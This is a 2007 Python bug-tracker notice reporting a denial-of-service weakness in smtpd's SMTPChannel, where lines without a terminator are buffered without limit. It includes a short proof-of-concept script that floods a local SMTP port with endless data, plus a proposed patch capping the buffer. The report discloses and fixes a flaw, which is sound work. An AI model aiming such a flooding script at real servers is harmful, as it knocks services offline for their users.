[ python-Bugs-1745035 ] DoS smtpd vulnerability
SourceForge.net
noreply at sourceforge.net
Thu Jun 28 21:45:47 CEST 2007
Bugs item #1745035, was opened at 2007-06-28 21:44
Message generated for change (Comment added) made by billiejoex
You can respond by visiting:
https://sourceforge.net/tracker/?func=detail&atid=105470&aid=1745035&group_id=5470
Please note that this message will contain a full copy of the comment thread,
including the initial issue submission, for this request,
not just the latest update.
Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Private: No
Submitted By: billiejoex (billiejoex)
Assigned to: Nobody/Anonymous (nobody)
Summary: DoS smtpd vulnerability
Initial Comment:
Method "collect_incoming_data" of "SMTPChannel" class should stop buffering if received lines are too long (possible Denial-of-Service attacks).
Without truncating such buffer a simple malicious script sending extremely long lines without "\r\n" terminator could easily saturate system resources.
----------------------------------------------------------------------
>Comment By: billiejoex (billiejoex)
Date: 2007-06-28 21:45
Message:
Logged In: YES
user_id=1357589
Originator: YES
--- malicious script
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8025))
while 1:
s.sendall('x' * 1024)
--- proposed smtpd.py patch
124a125
> self.__in_buffer_len = 0
135a137,139
> self.__in_buffer_len += len(data)
> if self.__in_buffer_len > 4096:
> self.__line = []
----------------------------------------------------------------------
You can respond by visiting:
https://sourceforge.net/tracker/?func=detail&atid=105470&aid=1745035&group_id=5470
More information about the Python-bugs-list
mailing list